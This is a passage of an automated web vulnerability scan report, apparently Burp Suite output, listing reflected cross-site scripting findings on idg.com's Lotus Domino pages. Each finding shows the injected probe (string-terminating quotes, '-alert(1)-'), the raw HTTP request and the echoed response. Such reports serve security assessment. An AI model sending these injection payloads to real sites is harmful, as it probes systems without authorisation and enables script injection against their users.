2.112. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d821a"%3becac31d59cc was submitted in the REST URL parameter 4. This input was echoed as d821a";ecac31d59cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/IDG_Newsd821a"%3becac31d59cc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_Newsd821a";ecac31d59cc");
} catch(err) {}</script>
...[SNIP]...

2.113. http://idg.com/www/HomeNew.nsf/docs/IDG_News [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/IDG_News

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aee3"-alert(1)-"3f5767d6355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:51 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/IDG_News?1aee3"-alert(1)-"3f5767d6355=1");
} catch(err) {}</script>
...[SNIP]...

2.114. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d38df"%3b63795650db was submitted in the REST URL parameter 1. This input was echoed as d38df";63795650db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd38df"%3b63795650db/HomeNew.nsf/docs/News_Service_Intro HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd38df";63795650db/HomeNew.nsf/docs/News_Service_Intro");
} catch(err) {}</script>
...[SNIP]...

2.115. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f31a"%3bf49933a2289 was submitted in the REST URL parameter 3. This input was echoed as 6f31a";f49933a2289 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs6f31a"%3bf49933a2289/News_Service_Intro HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6f31a";f49933a2289/News_Service_Intro");
} catch(err) {}</script>
...[SNIP]...

2.116. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec197"%3bcf066359d11 was submitted in the REST URL parameter 4. This input was echoed as ec197";cf066359d11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/News_Service_Introec197"%3bcf066359d11 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Introec197";cf066359d11");
} catch(err) {}</script>
...[SNIP]...

2.117. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/News_Service_Intro

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f97"-alert(1)-"2417de8ae21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/News_Service_Intro?82f97"-alert(1)-"2417de8ae21=1");
} catch(err) {}</script>
...[SNIP]...

2.118. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9d27"%3bed6f933dbda was submitted in the REST URL parameter 1. This input was echoed as c9d27";ed6f933dbda in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwc9d27"%3bed6f933dbda/HomeNew.nsf/docs/Tech_Update HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwc9d27";ed6f933dbda/HomeNew.nsf/docs/Tech_Update");
} catch(err) {}</script>
...[SNIP]...

2.119. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ca0"%3b337c5265295 was submitted in the REST URL parameter 3. This input was echoed as e2ca0";337c5265295 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docse2ca0"%3b337c5265295/Tech_Update HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docse2ca0";337c5265295/Tech_Update");
} catch(err) {}</script>
...[SNIP]...

2.120. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5393d"%3b6d1b7fafa03 was submitted in the REST URL parameter 4. This input was echoed as 5393d";6d1b7fafa03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Tech_Update5393d"%3b6d1b7fafa03 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update5393d";6d1b7fafa03");
} catch(err) {}</script>
...[SNIP]...

2.121. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Tech_Update

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f0fb"-alert(1)-"5adeeb9e27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Tech_Update?5f0fb"-alert(1)-"5adeeb9e27=1");
} catch(err) {}</script>
...[SNIP]...

2.122. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b76d"%3b5c59a29b3cd was submitted in the REST URL parameter 1. This input was echoed as 3b76d";5c59a29b3cd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www3b76d"%3b5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www3b76d";5c59a29b3cd/HomeNew.nsf/docs/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.123. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56031"%3b9d8b60f1346 was submitted in the REST URL parameter 3. This input was echoed as 56031";9d8b60f1346 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs56031"%3b9d8b60f1346/U.S._Sales HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs56031";9d8b60f1346/U.S._Sales");
} catch(err) {}</script>
...[SNIP]...

2.124. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e4f8"%3b82b293410c0 was submitted in the REST URL parameter 4. This input was echoed as 5e4f8";82b293410c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Sales5e4f8"%3b82b293410c0 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales5e4f8";82b293410c0");
} catch(err) {}</script>
...[SNIP]...

2.125. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/U.S._Sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e5"-alert(1)-"271304f8b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1");
} catch(err) {}</script>
...[SNIP]...

2.126. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd23"%3b6009fde32 was submitted in the REST URL parameter 1. This input was echoed as 4cd23";6009fde32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www4cd23"%3b6009fde32/HomeNew.nsf/docs/about_IDG HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www4cd23";6009fde32/HomeNew.nsf/docs/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.127. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770bb"%3b7fc456656cc was submitted in the REST URL parameter 3. This input was echoed as 770bb";7fc456656cc in the application's response.

